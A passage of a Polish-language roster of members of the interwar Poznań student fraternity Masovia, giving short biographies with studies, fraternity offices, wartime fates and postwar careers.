 39. Leon Gapiński, c. ok. 1931, skreślony 1932 [prawd. Leon Gapiński (5 kwietnia 1907 w Legnicy - ) s. Jana (prokurenta banku) i Teodozji ze Styczyńskich, uczeń gimnazjów poznańskich, a następnie gimnazjum w Pyzdrach, gdzie zdał maturę (1929), od 1930 przynajmniej do 1938 student Wydziału Prawno-Ekonomicznego UP, c. 1931, na własną prośbę skreślony z Chrobrii 1933, w czasie przerwy w studiach prowadził przedsiębiorstwo handlowe rodziców, odbył służbę wojskową w Szkole Podchorążych Rezerwy Piechoty w Jarocinie, przydzielony do 55 Pułku Piechoty]

  Franciszek Gburkowski, 1927 r.

 40. Franciszek Gburkowski, student med. UP, sekretarz sem. zim. 1928/29 oraz wiceprezes wewn. sem. zim. 1929/30, c. ok. 1931

 41. Stefan Górczyński, c. ok. 1931, wystąpił 1932
 42. Stanisław Górski, c. ok. 1929, skreślony 1930
 43. Stanisław Góźdź, sekretarz sem. let. 1926/27, skreślony 1930
 44. Adam Guzowski, ( - 1969)
 45. Józef Hauser, student prawa UP, c. ok. 1931

  Teodor Hauser, 1938 r.

 46. Teodor Hauser, ( - 22 stycznia 1939 w Poznaniu) z Kościana, prezes sem. let. 1933/34 (od maja) oraz sem. zim. 1934/35, reprezentował Korporację na Kongresie Eucharystycznym w Budapeszcie 1938

  Edmund Hernet, prawd. koniec lat 20-tych.

 47. Edmund Hernet, olderman sem. zim. 1929/30, dr med.

  Ludwik Heyduk, 1939 r.

 48. Ludwik Heyduk, (3 sierpnia 1915 w Nowym Kromsku w Niemczech (?) - 1987 we Wrocławiu) s. Sylwestra i Marii z d. Tomiak (?), absolwent Gimnazjum w Krotoszynie 1934, student prawa UP, wiceprezes zewn. sem. let. 1938/39 (ostatnie Prezydium przed wojną), adwokat, po wojnie m.in. radca prawny w PGR O/Woj. we Wrocławiu

  Michał Howorka, 1929 r.

 49. Michał Howorka, (29 września 1900 we wsi Zielonki k. Krakowa - 10 marca 1942 w Auschwitz) student i absolwent 1924 prawa UP, wiceprezes zewn. sem. zim. i sem. let. 1928/29, olderman sem. let. 1929/30 i sem. zim. 1930/31, asesor Sądu ZPKA 1930, działacz akademicki, m.in. Bratniej Pomocy, Koła Prawników i Ekonomistów, Młodzieży Wszechpolskiej, inicjator akcji propagandowej za włączeniem Prus Wschodnich do Polski 1927, od 1930 adwokat, publicysta, redaktor “Biblioteki Prawniczej”, działacz polityczny związany z polskim obozem narodowym, członek Stronnictwa Narodowego, Związku Młodych Narodowców, Stronnictwa Wielkiej Polski, Obozu Narodowo-Radykalnego, w czasie II wojny światowej w konspiracji w ZWZ, aresztowany przez Gestapo w 1941, zesłany do obozu koncentracyjnego w Auschwitz, tam zamordowany

  Mieczysław Hubert, 1939 r.

 50. Mieczysław Hubert, (28 kwietnia 1911 w Brusach pow. Chojnice - ) z Jarocina, absolwent Gimnazjum Klasycznego im. Tadeusza Kościuszki w Jarocinie 1930, od 1930 student Wydziału Prawno-Ekonomicznego UP, c. 1930 Surma, akt. 1930-31, później w Masovii, miał zginąć w Katyniu (brak jednak na liście katyńskiej)

 51. Bernard Jabłoński, sekretarz sem. zim. 1929/30, wiceprezes sem. let. 1930/31 [prawd. ziemianin z okolic Działdowa, prawnik, sędzia wojskowy, miał utonąć w Bugu, pochowany w Działdowie]
 52. Stefan Jabłoński, (ok. 1917 - ) ?
 53. Stefan Jakubowski, (3 lipca 1911 w Dreźnie - 19 października 1987 w Poznaniu) s. Stanisława i Marii, student i absolwent 1935 prawa UP, c. 1928, po studiach pracownik Prokuratorii Generalnej w Poznaniu, uczestnik wojny obronnej 1939, jeniec niemieckiego stalagu XI B k. Fallingbostel, po wojnie pracownik Prokuratorii Generalnej w Poznaniu, adwokat w Szamotułach 1953-66, radca prawny PZU w Poznaniu 1966-77, pochowany na Cmentarzu na Junikowie
 54. Janicki,

  Wiktor (?) Jankowski, 1939 r.

 55. Wiktor Jankowski, założyciel Masovii, ps. “Tyt”

  Lucjan Jaraczewski (?), 1939 r.Lucjan Jaraczewski (?), 1939 r.

 56. Lucjan Jaraczewski, (1918-1992) s. Edmunda (Rosevia), brat Zbigniewa (Masovia), wiceprezes wewn. sem. zim. i sem. let. 1938/39 (ostatnie Prezydium przed wojną), mgr praw, w czasie okupacji na robotach przymusowych w Niemczech, po 1939 adwokat w Bydgoszczy

  Bogdan Zbigniew Jaraczewski, 1939 r.

 57. Bogdan Zbigniew Jaraczewski, (19 lutego 1916 w Poznaniu - 2003 w Torzymiu) s. Edmunda (Rosevia), brat Lucjana (Masovia), absolwent Gimnazjum w Bydgoszczy 1935, student i absolwent med. UP 1935-39 i 1947, c. 1937, reprezentant Korporacji na Kongresie Eucharystycznym w Budapeszcie 1938, kierownik Młodzieży Wszechpolskiej na Wydziale Lekarskim UP, działacz narodowy, ochotnik w wojnie obronnej 1939 w 14 Pułku Piechoty, m.in. uczestnik obrony Warszawy, w 1939 aresztowany przez Gestapo wywieziony do obozu karnego w Szubinie, a następnie przesiedlony do Generalnej Guberni, wcielony do II Armii LWP 1944-46, kierownik Ośrodka Zdrowia w Żerkowie k. Poznania, ftyzjatra, lekarz w sanatorium gruźliczym dla dzieci w Ludwikowie 1949-56, ordynator w szpitalu ftyzjatrycznym w Piaskowie Wlkp. 1956-63, lekarz w sanatorium dla płucnochorych w Torzymiu (przekształcone w Wojewódzki Szpital Specjalistyczny Gruźlicy i Chorób Płuc) 1963-81 oraz 1984-88, artysta malarz, organizator i prezes 1977-88 Torzymskiego Towarzystwa Kultury, odznaczony m.in. Krzyżem Kawalerskim OOP, odznaką “Zasłużony Działacz Kultury”

 58. Jan Jasiński, (1903-1993)
 59. Walerian Jasiński, absolwent WSH, po wojnie mieszkał w Bielsku-Białej

  Łukasz Jesse, ok. 1932 r. (?).

 60. Łukasz Jesse, (10 września 1909 w Poznaniu - 26 stycznia 2002 w Poznaniu) s. Jana i Zofii z d. Maćkowiak, absolwent Gimnazjum w Pyzdrach 1928, student i absolwent ekonomii WSH 1928-31, c. 1927, skarbnik sem. zim. 1930/31, członek Sodalicji Mariańskiej, pracownik firmy Międzynarodowi Ekspedytorzy C. Hartwig w Poznaniu 1931-34, redaktor wydawnictwa “Prasa Kupiecko-Przemysłowa” 1934-36, nauczyciel w Gimnazjum Kupieckim 1936-39, działacz społeczny, sekretarz Ligi Morskiej i Kolonialnej w Poznaniu, po wojnie m.in. pracownik w spółdzielczości we Wałbrzychu i Wrocławiu, od 1951 na stanowiskach kierowniczych w przedsiębiorstwach spółdzielczych, kierownik Cechu Ślusarzy i Rzemiosł Pokrewnych 1957-76, archiwista Masovii i od końca lat 80-tych orędownik reaktywacji Masovii, sekretarz Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich 1991-94, współautor “Księgi Pamiątkowej Korporacji Studentów Uniwersytetu Poznańskiego Masovia” (Poznań 1996), pochowany na Cmentarzu Górczyńskim w Poznaniu

 61. Stefan Jędrasiak, c. ok. 1930, skreślony 1930
 62. Antoni Jędrzejczak,

  Albin Juchta, pierwsza poł. lat 30-tych.

 63. Albin Juchta, ( - 1945 w Holandii) wiceprezes zewn. sem. zim. 1933/34 i sem. let. 1934/35, prezes sem. let. 1935/36, zginął w wypadku motocyklowym

  Jan Karls, lata 30-te.

 64. Jan Karls, student prawa UP, wiceprezes zewn. sem. let. 1926/27, wiceprezes Bratniej Pomocy 1930, prezes Koła Prawników i Ekonomistów 1939, mgr praw, po studiach adwokat w Bydgoszczy

 65. Tadeusz Kaszyński, (1910 - lutego 1995 w Gdańsku) skarbnik sem. zim. 1931/32, sekretarz sem. zim. 1933/34
 66. Jan Kawczyński, c. ok. 1929, skreślony 1930

  Alfons Kempiński, 1939 r.

 67. Alfons Kempiński, ( - po 1978) wiceprezes wewn. sem. let. 1934/35 oraz wiceprezes sem. zim. 1935/56, olderman sem. let. 1937/38, prezes Bratniej Pomocy Studentów UP 1937/38, prezes Młodzieży Wszechpolskiej 1935, kierownik Akademickiego Wydziału Młodzieży SN, po wojnie na emigracji w Stanach Zjednoczonych (Wielkiej Brytanii ?)

  Leopold Kędzierski, prawd. koniec lat 20-tych.

 68. Leopold Kędzierski, (1908 - 1986 w Warszawie) student i absolwent ekonomii UP, prezes sem. zim. i sem. let. 1928/29, wiceprezes zewn. sem. zim. 1929/30, po studiach pracownik oddziałów Banku Polskiego w Toruniu i Lesznie, w czasie okupacji w Wilnie, po 1945 dyrektor oddziałów NBP w Wadowicach i Warszawie, a następnie pracownik naukowy Instytutu Organizacji i Mechaniki Budownictwa oraz Ośrodku Komputeryzacji Rynku w Ministerstwa Handlu Wewnętrznego i Usług 1964-68, publicysta w branży, pochowany na Centralnym Cmentarzu Komunalnym w Warszawie

 69. Stefan Kinka, założyciel Masovii
 70. Edmund Klonowski, (24 stycznia 1917 w Brodnicy - ) s. Alojzego i Anny Klonowskich, brat Jana (Pomerania), absolwent Gimnazjum Klasycznego w Brodnicy, student i absolwent prawa UP, w czasie wojny pracował jako elektromonter, po wojnie jako główny księgowy i doradca finansowy, odznaczony Srebrnym i Złotym Krzyżem Zasługi

  Leon Kokoszyński, 1927 r.

 71. Leon (Ludwik) Kokoszyński, skarbnik 1928/29, wiceprezes sem. zim. 1930/31, dr med.

  Alfons Kolasiński (?), 1925 r.

 72. Alfons Kolasiński, (30 lipca 1904 - 13 listopada 1964) wiceprezes wewn. sem. let. 1926/27, skreślony 1930, zginął tragicznie w wypadku samochodowym

  Brunon Kołodziejski, ok. 1932 r. (?).

 73. Brunon Kołodziejski, (25 stycznia 1904 w Świeciu nad Wisłą - 2 grudnia 1968 w Gdyni) student i absolwent WSH, olderman sem. let. 1931/32

 74. Bolesław Kończewski, wystąpił 1930

  Tadeusz Kopernik, 1927 r.

 75. Tadeusz Kopernik, skreślony 1930

  Stanisław Kosicki, pierwsza poł. lat 30-tych.

 76. Stanisław Kosicki, wiceprezes zewn. sem. zim. 1930/31

 77. Bogdan Krobski, skreślony 1930

  E. Landmesser (?), 1925 r.

 78. E. Landmesser,

  Konrad Landmesser (?), 1925 r.

 79. Konrad Landmesser, prezes sem. let. 1926/27

 80. Stanisław Lemański, c. ok. 1926, skreślony 1927
 81. Tadeusz Lewandowski, sekretarz sem. let. i sem. zim. 1925/26 oraz sem. zim. 1926/27
 82. Józef Licznerski, student i absolwent prawa UP, założyciel Masovii, adwokat w Grudziądzu, radca prawny szwedzkiego koncernu telekomunikacyjnego w Warszawie, w 1939 wyemigrował do Szwecji, zamieszkał w Sztokholmie
 83. Edward Lisiecki, z Rogoźna Wlkp., absolwent WSH
 84. Ludwikowski,

  Roman Łaniecki, 1936/37 r.

 85. Roman Łaniecki, (4 sierpnia 1913 w Ryszewcu pow. Żnin - 21 grudnia 1994 we Wrocławiu) absolwent Gimnazjum w Rogoźnie Wlkp. 1934, student i absolwent 1938 prawa UP, sekretarz sem. zim. 1935/36, wiceprezes sem. let. 1935/36 i sem. zim. 1936/37, prezes sem. let. 1936/37 i sem. zim. i sem. let. 1937/38, olderman sem. zim. 1938/39, sekretarz PKM 1936, delegat PKM na IX Radę Naczelną ZPKA, sekretarz generalny ZPKA 1937-38 (XV kadencja), członek Zarządu Koła Prawników i Ekonomistów 1938/39, członek Komitetu Realizacji Ślubów Jasnogórskich, działacz narodowy Młodzieży Wszechpolskiej i Stronnictwa Narodowego, podczas okupacji w podziemnej w NOW w Tarnowie, po wojnie adwokat w Nowej Soli, wicedziekan Rady Adwokackiej w Zielonej Górze, od 1967 dyrektor Doświadczalnego Zakładu Pasz we Wrocławiu

  Gwidon Łukaszewski, 1927 r.

 86. Gwidon Łukaszewski, założyciel Masovii, dr med.

  Bogdan Maciejewski, 1930 r.

 87. Bogdan Kazimierz Maciejewski, (8 lutego 1910 w Trzemesznie - 28 kwietnia 1996) s. Wacława i Izabeli z d. Żuromskiej, brat Mariana (Masovia), absolwent Państwowego Gimnazjum Klasycznego w Trzemesznie 1920-28, student i absolwent prawa UP 1928-33, gospodarz 1928/29, członek Zarządu Bratniej Pomocy i Koła Regionalnego Trzemesznian, wydał broszurę “Trzemeszno”, od czasów studiów pracował jako dziennikarz w “Dzienniku Kujawskim” z Inowrocławia oraz “Lechu” z Gniezna, po studiach adwokat, w wojnie obronnej 1939 w Armii Poznań (?), w czasie okupacji w Generalnej Guberni w konspiracyjnym Kierownictwie Walki Cywilnej (później zmieniono nazwę na Kierownictwo Oporu Społecznego) w Mińsku Mazowieckim, po 1945 adwokat we Wrocławiu, Piszu i Ostródzie, dr prawa UP 1947 (?), prześladowany przez UB

  Marian Maciejewski, 1939 r.

 88. Marian Maciejewski, (15 września 1907 w Trzemesznie - 26 kwietnia 1975 w Grenoble) s. Wacława i Izabeli z d. Żuromskiej, brat Bogdana (Masovia), absolwent Gimnazjum w Trzemesznie 1934, student i absolwent prawa UP 1924-33, po studiach pracownik poznańskiego magistratu, po wybuchu wojny przez Węgry dostał się do Francji, uczestnik kampanii francuskiej 1940, więziony przez Gestapo w Lyonie, długoletni pracownik PCK w Grenoble, a następnie kierownik biura fabryki chemicznej w Grenoble

  Edmund Malczewski, 1936/37 r.

 89. Edmund Jacek Malczewski, (10 października 1909 - 21 lutego 1956 w Poznaniu) wiceprezes zewn. sem. let. 1931/32, olderamn sem. zim. 1935/36, sem. zim. 1936/37 i sem. zim. 1937/38, pochowany na Cmentarzu na Junikowie (Jeżycach ?)

  Longin Malicki, 1929 r.

 90. Longin Malicki, (12 stycznia 1908 w Sławnie k. Gniezna - 19 listopada 1986 w Gdańsku) z rodziny inteligenckiej, s. Wacława i Klary z d. Scheithauer, absolwent Gimnazjum w Chodzieży 1927, student i absolwent (mgr filozofii w zakresie antropologii, etnografii z etnologią i prehistorii) Wydziału Humanistycznego UP 1927-32, sekretarz sem. let. 1928/29, olderman sem. let. 1931/32, po studiach od 1933 wolontariusz, a od 1935 pracownik działu etnograficznego Muzeum Śląskiego w Katowicach, w czasie okupacji portier, a następnie kierownik w wydawnictwie Salonu Malarzy Polskich w Krakowie, w 1944 aresztowany przez Gestapo i osadzony w więzieniu na Montelupich, po wojnie kierownik działu etnograficznego oraz dyrektor Muzeum Górnośląskiego w Bytomiu 1945-52, doktorat UP 1950, następnie pracownik m.in. Muzeum Archeologicznego i Etnograficznego w Łodzi, Muzeum Pomorskiego w Gdańsku oraz Muzeum Etnograficznego w Krakowie, od 1958 twórca i kierownika działu etnograficznego Muzeum Narodowego w Gdańsku, m.in. nadzorował odbudowę przeznaczonego na siedzibę Muzeum Etnograficznego Pałacu Opatów w Oliwie 1959-65, sprawował opiekę merytoryczną nad muzeami regionalnymi woj. gdańskiego, w tym nad skansenem we Wdzydzach, kurator Muzeum Narodowego w Gdańsku 1972-73, w ramach swojej pracy zawodowej pozyskał dla różnych polskich muzeów łącznie ok. 15 000 eksponatów, autor ok. 190 artykułów źródłowych i publicystycznych zamieszczanych w czasopismach specjalistycznych („Lud”, „Prace i Materiały Etnograficzne”, „Ethnographica”, „Polska Sztuka Ludowa”), regionalnych („Zaranie Śląskie”, „Kaszëbë”, „Litery” i in.) oraz w prasie codziennej, działacz Polskiego Towarzystwa Ludoznawczego, m.in. Zarządu Głównego 1964-67 i 1970-74 oraz w prezydium Zarządu 1973-76, współzałożyciel i przez 25 lat prezes oddziału PTL w Gdańsku, członek Sekcji Etnograficznej Komitetu Nauk Historycznych PAN oraz Komisji Etnograficznej Gdańskiego Towarzystwa Naukowego, Zespołu Doradczego ds. Muzealnictwa Etnograficznego przy Zarządzie Muzeów i Ochrony Zabytków, rady programowej gdańskiego oddziału Stowarzyszenia Twórców Ludowych, rzeczoznawca w Cepelii, wyróżniony m.in. Orderem Stańczyka, medalem i nagrodą im. O. Kolberga 1978, nagrodą im. Gulgowskich 1981, Krzyżem Kawalerskim OOP 1972, jego imię obrał Gdański Oddział Stowarzyszenia Twórców Ludowych, a na budynku Oddziału Etnograficznego Muzeum Narodowego w Gdańsku odsłonięto ku jego czci pamiątkową tablicę, pochowany na Cmentarzu Srebrzysko we Wrzeszczu

  Tadeusz Mallow, 1927 r.

 91. Tadeusz Mallow, (1904 - 30 grudnia 1989) wieloletni prof. Gimnazjum w Gnieźnie, więzień obozu jenieckiego w Woldenbergu, pochowany na Cmentarzu św. Piotra w Gnieźnie

 92. Antoni Marcinkowski, z Kruszwicy, założyciel Masovii, wiceprezes wewn. sem. let. 1929/30 i sem. zim. 1930/31

  Bolesław (?) Marcinkowski, 1927 r.

 93. Bolesław Marcinkowski, (30 marca 1903 w Byszwaldzie pow. Lubawa - 4 sierpnia 1973 w Gdańsku) absolwent Gimnazjum w Brodnicy, dr med.

  Ignacy Mąka, 1937 r.

 94. Ignacy Mąka, wiceprezes zewn. sem. let. 1936/37

  Tadeusz Michalski, 1927 r.

 95. Tadeusz Michalski, z Gniezna

 96. Paweł Mistelski, olderman sem. zim. 1925/26, prezes 1926/27

  Witold Misterek, 1929 r.

 97. Witold Misterek, (12 września 1903 w Bydgoszczy -1997) s. Bronisława i Anny z Birzyńskich, absolwent Gimnazjum Klasycznego w Bydgoszczy 1921, ochotnik w wojnie polsko-rosyjskiej 1920, student ekonomii UP 1921-25, założyciel Masovii, olderman sem. let. 1923/24 i sem. zim. 1928/29 (od lutego), w lipcu 1925 organizator I Zjazdu Masvoii w Działdowie, w 1927 wicestarosta Torunia, pracownik ZUS w Poznaniu 1928-39, ppor. rez. art. 1929, przypisany do 7 Dywizjonu Artylerii Konnej w Poznaniu, por. rez. art., w wojnie obronnej 1939 dowódca baterii w 67 Dywizjonie Artylerii Lekkiej w Armii “Poznań”, m.in. walczył w obronie Modlina, więzień niemieckich oflagów, m.in. VII A w Murnau, po wojnie pracownik PZU w Warszawie 1946-53, m.in. dyrektor Biura Organizacji i Planowania, Biura Rozliczeń Budownictwa 1953-59, Głównego Urzędu Statystycznego 1959-62, Ministerstwa Handlu Wewnętrznego i Usług 1962-68, pochowany na warszawskich Powązkach, odznaczony m.in. Krzyżem Kawalerskim OOP, Medalem za udział w Wojnie Obronnej 1939, pochowany na warszawskich Powązkach

  Źródła dodatkowe: uzupełnienia Paweł Janicki, www.7dak.pl

 98. Leon Michał Miszewski, (20 września 1914 w Brusach pow. Chojnice - ) student med. UP, wiceprezes zewn. sem. zim. 1938/39, prezes sem. let. 1938/39 (ostatnie Prezydium przed wojną), absolwent med. Warszawa 1940, podczas okupacji lekarz w Warszawie, po 1945 dyrektor ośrodka zdrowia w Karczewie
 99. Alfons Mroczkowski, wystąpił 1930

  Mrówczyński (?), lata 30-te.

 100. Mrówczyński

  Walenty Murkowski, 1928 r.

 101. Walenty Murkowski, (23 maja 1902 w Dolsku k. Śremu -10 września 1977 w Poznaniu) s. Franciszka i Wiktorii z Jabczyńskich, absolwent Gimnazjum w Śremie, student i absolwent (dr med. 1929) med. UP, wiceprezes wewn. sem. zim. 1926/27 oraz olderman sem. zim. 1928/29, po studiach lekarz w Świeciu n. Wisłą i w Śmiglu, a w latach 1932-76 lekarz w Mosinie, po 1945 wiceburmistrz Mosiny, działacz społeczny, m.in. PCK i Polskiego Związku Łowieckiego, pochowany na Cmentarzu w Mosinie, odznaczony m.in. Złotym Krzyżem PCK, odznaką “Za Zasługi w Rozwoju Województwa Poznańskiego” oraz Medalem Rzeczypospolitej Mosińskiej, pochowany na cmentarzu w Mosinie

 102. Józef Mykowski, sekretarz sem. zim. 1927/28, wystąpił 1934
 103. Bronisław Nagiel, c. ok. 1926, skreślony 1927

  Bernard Nowak, 1937 r.

 104. Bernard Nowak, sekretarz sem. zim. 1937/38

 105. Erwin Nowak, c. ok. 1929, skreślony 1930

  Od lewej Antoni Nowakowski, Łukasz Jesse.

 106. Antoni Nowakowski, (1908 w Siekierkach Małych pow. Środa Wlkp. - 29 października 1976 w Toronto) absolwent WSH, kpt. rez., w czasie okupacji w AK, żołnierz Powstania Warszawskiego, po wojnie na emigracji, członek Zarządu Głównego Związku Polaków w Kanadzie 1961-63, pochowany na Cmentarzu Mount Pleasant w Toronto

 107. Stefan Otwinowski, z Pyzdr, literat
 108. Kazimierz Owczarek, ekonomista

  Jerzy Panek (Leon Pankanin ?), 1938 r.

 109. Jerzy Panek, ( - 1941 w Warszawie) ostatni prezes Młodzieży Wszechpolskiej w Poznaniu, dr praw, aresztowany przez Gestapo i stracony

 110. Leon Pankanin, (22 marca 1914 w Ostrowie Wlkp. -1985) s. Leona i Kazimiery z Twardowskich, absolwent Gimnazjum w Ostrowie Wlkp. 1934, student prawa UP 1934 oraz 1936-39, członek Lechii, a następnie Masovii, członek Zarządu Bratniej Pomocy 1938, uczestnik wojny obronnej 1939 w Opalenickim Batalionie Obrony Narodowej, jeniec niemieckich obozów jenieckich XA Sandbostel i XXIA Schleswig, zwolniony z powodu choroby 1940, po wojnie pracował m.in. w Urzędzie Wojewódzkim w Krakowie, a następnie w NIK i Izbie Rzemieślniczej w Krakowie, absolwent Wyższej Szkoły Nauk Społecznych przy KC PZPR 1969 oraz Wydziału Nauk Społecznych UW 1971, mgr nauk politycznych, od 1945 działacz Stronnictwa Demokratycznego, m.in. członek władz Stowarzyszenia, działacz społeczny i związków zawodowych, m.in. rad narodowych i Towarzystwa Przyjaźni Polsko-Radzieckiej, odznaczony m.in. Krzyżem Kawalerskim i Oficerskim OOP, Złotym Krzyżem Zasługi, Złotą Odznaką za zasługi w Rzemiośle oraz Złotą Odznaką za zasługi dla ziemi krakowskiej
 111. Mieczysław Paszkiewicz, (?), działacz ONR, żołnierz AK, działacz podziemnego SN w Piotrkowie Trybunalskim, po wojnie prześladowany przez władze komunistyczne, skazany na 15 lat więzienia za pracę w Komitecie Pomocniczym NSZ, adwokat w Piotrkowie

  Franciszek Pączkowski, 1930 r.

 112. Franciszek Pączkowski, ( - zm. w Bydgoszczy) student prawa UP, sekretarz sem. zim. 1931/32, wiceprezes wewn. sem. let. 1931/32 i sem. zim. 1932/33, mgr praw

  Jan Piątkowski, 1937 r.

 113. Jan Piątkowski, (11 marca 1913 w Hrubieszowie - 9 lipca 2007) z rodziny inteligenckiej, s. Antoniego i Marii z Grabskich, absolwent Gimnazjum im. Adama Asnyka w Kaliszu 1932, student prawa i ekonomii UP 1932-39 (absolutorium prawa 1937 i ekonomii 1939), c. 1935, sekretarz sem. zim. 1936/37, wiceprezes sem. let. 1936/37, członek Sodalicji Mariańskiej i Młodzieży Wszechpolskiej, podczas okupacji w Generalnej Guberni, pracował jako praktykant leśny i leśniczy na Lubelszczyźnie, po 1945 w organizacji podziemnej WiN, w 1946 aresztowany przez UB i skazany na 10 lat więzienia (wyrok skrócono na mocy amnestii do 5 lat), więziony we Wronkach i Potulicach 1947-51, w 1952 Ministerstwo Szkolnictwa Wyższego w Warszawie nie wyraziło zgody na zdanie dwóch egzaminów dyplomowych z prawa i ekonomii, księgowy PGR w Zielonogórskim 1952-71, Filister honorowy Magna-Polonii 2004, reaktywator Masovii 2006

 114. Witold Piechocki, c. ok. 1929, skreślony 1930

  Bernard Piotrowski, pierwsza poł. lat 30-tych.

 115. Bernard Piotrowski, dr med., lekarz w Nowym Mieście n. Drwęcą (w Lubawie ?)

 116. Feliks Piotrowski, założyciel Masovii, prezes sem. let. 1924/25, olderman sem. let. 1928/29, prezes sem. let. 1930/31, dr med., po wojnie w Argentynie (Brazylii ?)
 117. Teofil Jan Piotrowski, wiceprezes wewn. sem. let. 1933/34 i sem. zim. 1934/35
 118. Edward Piszcz, wystąpił 1930, członek Zarządu Wojewódzkiego Wydziału Młodych SN Pomorze, podczas okupacji w ścisłym kierownictwie konspiracyjnej organizacji “Ojczyzna”

  Franciszek Pleciński, lata 30-te.

 119. Franciszek Pleciński, (9 sierpnia 1911 w Bochum - 13 kwietnia 1992 w Poznaniu) s. Józefa i Klary z d. Cierpik, uczeń gimnazjów w Jarocinie, Ostrzeszowie i Pyzdrach, student i absolwent rolnictwa UP 1932-39, w czasie okupacji pracował w Mszczynie, po wojnie na kierowniczych i dyrektorskich stanowiskach w przedsiębiorstwach i instytucjach rolniczych: w Państwowych Nieruchomościach Ziemskich (późniejsze PGR-y) w Dusinie k. Gostynia, Kwiliczu k. Międzychodu i Łomnicy k. Nowego Tomyśla, jako dyrektor Instytutu Hodowli i Aklimatyzacji Roślin w Oleśnicy Małej k. Oławy, jako dyrektor oddziału Centrali Nasiennej w Kościanie-Kurzejgórze, a w końcu w Poznańskich Zakładach Zbożowo-Młynarskich w Poznaniu

 120. Tadeusz Plitt, olderman sem. zim. 1930/31

  Tadeusz Pniewski, lata 30-te.

 121. Tadeusz Pniewski, (30 stycznia 1914 w Kaliszu - 26 kwietnia 1994) s. Józefa i Cecylii z Pajączkowskich, absolwent Gimnazjum im. Adama Asnyka w Kaliszu 1933, student med. UP (absolutorium 1939), wiceprezes wewn. sem. zim. i sem. let. 1937/38, mgr cantandi, uczestnik wojny obronnej 1939 w 67 Dywizjonie Artylerii Lekkiej, podczas okupacji pracownik Szpitala Powiatowego w Otwocku, członek AK ps. “Jastrzębiec” w Zgrupowaniu “Obroża”, kapral pchor. LWP 1944-46, absolwent med. UŁ 1946, dr med. AM w Łodzi 1962, po studiach pracownik służby zdrowia w Kaliszu i Łodzi 1946-79, m.in. dyrektor Wojewódzkiej Stacji Krwiodawstwa w Kaliszu 1952-62 oraz Wojewódzkiej Stacji Krwiodawstwa w Łodzi 1962-66, opublikował 46 prac naukowych z zakresu krwiodawstwa, bakteriologii, cytologii, pulmonologii, publicysta w “Ziemi Kaliskiej”, “Życiu Warszawy”, “Żyjmy dłużej” oraz literat, wydał wspomnieniowy “Kalisz z oddali” oraz tomiki wierszy “Krajobraz serdeczny “Cisza Jesienna” oraz “Wóz Dawida”, odznaczony m.in. Złotym Krzyżem Zasługi, Medalem “Za udział w wojnie obronnej 1939″, Krzyżem Armii Krajowej, wyróżniony Honorowym Obywatelstwem Miasta Kalisza, Nagrodą miasta Kalisza za rok 1984, pochowany w kwaterze żołnierskiej na Cmentarzu w Otwocku

  Tadeusz Pogorzały, 1927 r.

 122. Tadeusz Pogorzały, (22 marca 1907 w Kruszwicy - ) student i absolwent prawa UP 1926-31, wiceprezes wewn. sem. zim. i sem. let. 1928/29 oraz prezes sem. zim. 1929/30

  Jan Polcyn, 1925 r.

 123. Jan Polcyn, ( - 1939-45 w Warszawie) student leśnictwa UP, założyciel Masovii, prezes sem. zim. 1925/26, inż. leśnik, dyrektor Szkoły Leśnej w nadleśnictwie Kurów, prawdopodobnie zginął rozstrzelany przez Niemców

 124. Jan Przystalski, sekretarz sem. let. 1933/34 i sem. zim. 1934/35, wystąpił 1936

  Józef Psuty, lata 30-te.

 125. Józef Psuty, (1913-1980) skarbnik sem. zim. 1938/39, olderman sem. let. 1938/39 (ostatnie Prezydium przed wojną), prof. filologii klasycznej w Liceum Ogólnokształcącym w Brodnicy

  Ludwik Pyszora, 1929 r.

 126. Ludwik Pyszora,

 127. Stanisław Ratajski, c. ok. 1927, skreślony 1927

  Józef Roehr, lata 30-te.

 128. Józef Roehr, (12 marca 1908 w Gnieźnie - 27 lipca 1988) student i absolwent matematyki UP 1926-34, oficer rez., w wojnie obronnej 1939 dowódca plutonu ciężkich karabinów maszynowych w Pułku Inowrocławskim, w niewoli niemieckiej w oflagu w Woldenbergu, po studiach prof. matematyki, fizyki i języka niemieckiego w szkołach średnich w Trzemesznie, Inowrocławiu, Gnieźnie, Poznaniu, m.in. w V LO im. Klaudyny Potockiej i I LO im. Karola Marcinkowskiego w Poznaniu, kierownik sekcji fizyki w Okręgowym Ośrodku Metodycznym w Poznaniu, “przyjaciel młodzieży”, pochowany na Cmentarzu w Puszczykowie

 129. Stefan Roehsler, “żelazny student”, wiceprezes zewn. sem. let. 1933/34 i sem. zim. 1934/35, działacz Stronnictwa Narodowego
 130. Kazimierz Rozwadowski, wiceprezes sem. let. 1925/26, skreślony 1931
 131. Tadeusz Rutkowski, założyciel Masovii
 132. Władysław Rutkowski, (1916 - 21 lutego 2011) student prawa UP 1936, c. 1937, mgr praw i mgr nauk ekonomiczno-politycznych, żołnierz ZWZ-AK, Powstaniec Warszawski, inwalida i jeniec wojenny, ppłk WP, po wojnie adwokat, działacz kombatancki, członek Stowarzyszenia Filistrów Korporacji Akademickich w Poznaniu, pochowany na Cmentarzu Witomińskim w Gdyni
 133. Florian Sędzierski, student Wydziału Prawno-Ekonomicznego UP, c. ok. 1931, skreślony 1932, członek Młodzieży Wszechpolskiej
 134. Zygmunt Siekierski, c. ok. 1930, skreślony 1931

  Mikołaj Siński, 1932 r.

 135. Mikołaj Jerzy Siński, (5 grudnia 1908 w Mławie - ) student i absolwent 1932 prawa UP, wiceprezes zewn. sem. zim. 1929/30, działacz polityczny

  Wacław Skonieczny, prawd. koniec lat 20-tych.

 136. Wacław Skonieczny, (14 września 1894 w Tylicach pow. Nowe Miasto na Warmii - 9 stycznia 1974 w Inowrocławiu) s. Klemensa i Waleski z d. Rutkowskiej, absolwent Gimnazjum w Nowym Mieście Lubawskim 1914, w czasie I wojny światowej w armii niemieckiej, po wojnie student med. w Berlinie, Bonn i Królewcu 1918-21, za udział w akcji plebiscytowej na Mazurach i Warmii skazany w 1921 przez Sąd Rzeszy za zdradę stanu na trzy lata ciężkiego więzienia, więziony w Brandenburgu, po powrocie do kraju student i absolwent med. UP, dr med. UP 1927, założyciel Masovii, w 1925 zorganizował I Zjazd Masovii w Działdowie, po studiach lekarz w Miejskiej Górce, Gnieźnie, Żninie, naczelny lekarz Ubezpieczalni Społecznej w Inowrocławiu 1936-39, uczestnik wojny obronnej 1939, zwolniony z niemieckiej niewoli, od 1939 lekarz w Warszawie, m.in. komisarz ds. walki z tyfusem plamistym w Warszawie 1940-42 oraz dyrektor Szpitala PCK w Warszawie 1942-44, członek podziemia, czynny w Radzie Pomocy Żydów, w czasie Powstania Warszawskiego 